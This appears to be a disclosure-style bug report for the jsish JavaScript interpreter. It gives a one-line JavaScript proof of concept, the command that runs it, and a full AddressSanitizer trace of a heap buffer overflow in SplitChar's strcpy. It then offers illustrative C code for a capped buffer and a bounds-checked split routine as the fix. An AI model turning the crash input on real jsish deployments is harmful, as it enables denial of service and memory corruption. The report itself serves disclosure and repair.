try{var a=" a aaaa ".repeat(1+100<<16).split();JSON.parse(parse(JSON.stringify));}catch(a){}JSON.stringify(+a);

// poc.js
try{var a=" a aaaa ".repeat(1+100<<16).split();}catch(a){}
Execution steps & Output
$ ./jsish/jsish poc.js
max alloc exceeded 104857600 Jsi_DSSetLength src/jsiDString.c:196
max alloc exceeded 211812358 Jsi_DSSetLength src/jsiDString.c:196
=================================================================
==3965184==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2d8707c900 at pc 0x00000049123e bp 0x7ffefcbaf3e0 sp 0x7ffefcbaeba0
WRITE of size 52953081 at 0x7f2d8707c900 thread T0
#0 0x49123d in strcpy (./jsish/jsish+0x49123d)
#1 0x5525eb in SplitChar ./jsish/src/jsiUtils.c:2061:5
#2 0x5525eb in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16
#3 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9
#4 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22
#5 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10
#6 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17
#7 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25
#8 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10
#9 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c
#10 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12
#11 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18
#12 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26
#13 0x7f2d90778082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
#14 0x42c9bd in _start (./jsish/jsish+0x42c9bd)
0x7f2d8707c900 is located 0 bytes to the right of 100000000-byte region [0x7f2d8111e800,0x7f2d8707c900)
allocated by thread T0 here:
#0 0x4a5419 in realloc (./jsish/jsish+0x4a5419)
#1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15
SUMMARY: AddressSanitizer: heap-buffer-overflow (./jsish/jsish+0x49123d) in strcpy
Shadow bytes around the buggy address:
0x0fe630e078d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e078e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e078f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e07900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe630e07910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe630e07920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe630e07970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3965184==ABORTING
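The trace above shows the two halves of this bug class side by side: Jsi_DSSetLength refused the growth ("max alloc exceeded 104857600"), yet SplitChar went on to strcpy 52953081 bytes starting exactly at the end of a 100000000-byte heap region. The added example below is not jsish's code; DString, ds_reserve, ds_append_n, split_pack and the ds_max_alloc cap are names assumed for this illustration. It shows the defensive pattern a reviewer would look for: a capped buffer whose grow routine reports failure, and a split routine that checks that result before every copy and bounds the copy by the field length instead of calling strcpy.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative capped string buffer. NOT jsish's Jsi_DString: the type,
 * function names and the cap variable are assumptions for this example.
 * The default cap is the 104857600 figure from the "max alloc exceeded"
 * lines in the report above. */
size_t ds_max_alloc = 104857600;

typedef struct {
    char *str;    /* heap buffer, NUL-terminated whenever str != NULL */
    size_t len;   /* payload bytes in use, excluding the NUL */
    size_t cap;   /* bytes allocated */
} DString;

void ds_init(DString *ds) { ds->str = NULL; ds->len = 0; ds->cap = 0; }
void ds_free(DString *ds) { free(ds->str); ds_init(ds); }

/* Ensure room for `need` payload bytes plus the NUL. Returns 0 on success,
 * -1 if that would exceed ds_max_alloc or realloc fails. A rejected grow
 * leaves the buffer untouched, so the caller must not write into it. */
int ds_reserve(DString *ds, size_t need) {
    if (need >= ds_max_alloc) {                /* need + 1 > cap, no wrap */
        fprintf(stderr, "max alloc exceeded %zu\n", need + 1);
        return -1;
    }
    if (need + 1 <= ds->cap) return 0;
    size_t ncap = ds->cap ? ds->cap : 64;
    if (ncap > ds_max_alloc) ncap = ds_max_alloc;
    while (ncap < need + 1)                    /* need + 1 <= cap, terminates */
        ncap = (ncap > ds_max_alloc / 2) ? ds_max_alloc : ncap * 2;
    char *p = realloc(ds->str, ncap);
    if (!p) return -1;
    if (!ds->str) p[0] = '\0';
    ds->str = p;
    ds->cap = ncap;
    return 0;
}

/* Append exactly n bytes. The copy happens only after the grow succeeded and
 * is bounded by n, so it cannot run past the end of the allocated region;
 * this is the check the strcpy in the trace above did not have. */
int ds_append_n(DString *ds, const char *s, size_t n) {
    if (n > SIZE_MAX - 1 - ds->len) return -1; /* len + n + 1 would wrap */
    if (ds_reserve(ds, ds->len + n) != 0) return -1;
    memcpy(ds->str + ds->len, s, n);
    ds->len += n;
    ds->str[ds->len] = '\0';
    return 0;
}

/* Split src on sep and pack the fields into out, each NUL-terminated, so
 * they can be walked with strlen. Returns the field count, or -1 when the
 * packed result would exceed the cap; on -1 out holds only a prefix and
 * the caller should discard it instead of treating it as the full split. */
long split_pack(DString *out, const char *src, char sep) {
    long fields = 0;
    const char *p = src;
    for (;;) {
        const char *q = sep ? strchr(p, sep) : NULL;
        size_t n = q ? (size_t)(q - p) : strlen(p);
        if (ds_append_n(out, p, n) != 0 || ds_append_n(out, "", 1) != 0)
            return -1;                         /* grow refused: stop, no copy */
        fields++;
        if (!q) return fields;
        p = q + 1;
    }
}

int main(void) {
    DString d;
    ds_init(&d);
    /* Constructed input: one repeat unit from the report's test case. */
    long n = split_pack(&d, " a aaaa ", ' ');
    printf("fields=%ld packed_len=%zu cap=%zu\n", n, d.len, d.cap);
    ds_free(&d);
    return 0;
}
```

Lowering ds_max_alloc in a test is the cheap way to exercise the refusal path without allocating 100 MB: the split must return -1 and leave the buffer either empty or holding only the fields copied before the cap was hit, never bytes past the allocation.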
Jsish revision
Commit: 42c694c
Version: v3.5.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
export JSI__SANITIZE=1
make
Credits: @Ye0nny, @EJueon of the seclab-yonsei.